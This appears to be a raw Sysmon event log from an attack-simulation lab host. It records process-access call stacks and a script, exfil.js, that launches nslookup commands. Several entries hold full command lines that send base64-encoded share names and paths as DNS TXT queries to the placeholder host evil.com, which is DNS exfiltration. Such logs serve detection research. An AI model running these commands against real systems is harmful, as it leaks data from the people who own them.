14:16:26.235{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D23F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.235{2E1864BB-17A1-629A-783D-000000005F02}55521352C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-D23F-000000005F02}6856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.237{2E1864BB-17BA-629A-D23F-000000005F02}6856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfrez.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.219{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxnb.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-17BA-629A-D03F-000000005F02}61767824C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D13F-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D13F-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.203{2E1864BB-17BA-629A-CF3F-000000005F02}67127852C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-D13F-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.211{2E1864BB-17BA-629A-D13F-000000005F02}7556C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-CF3F-000000005F02}6712C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxnb.tmp 2>&1 10341000x8000000000000000198832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.182{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D03F-000000005F02}6176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.182{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BA-629A-D03F-000000005F02}6176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.182{2E1864BB-17BA-629A-D03F-000000005F02}61767824C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-CF3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D03F-000000005F02}6176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CF3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.166{2E1864BB-17A1-629A-783D-000000005F02}55527736C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-CF3F-000000005F02}6712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.173{2E1864BB-17BA-629A-CF3F-000000005F02}6712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxnb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.150{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlecc.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-17BA-629A-CD3F-000000005F02}80407768C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-CE3F-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-CE3F-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 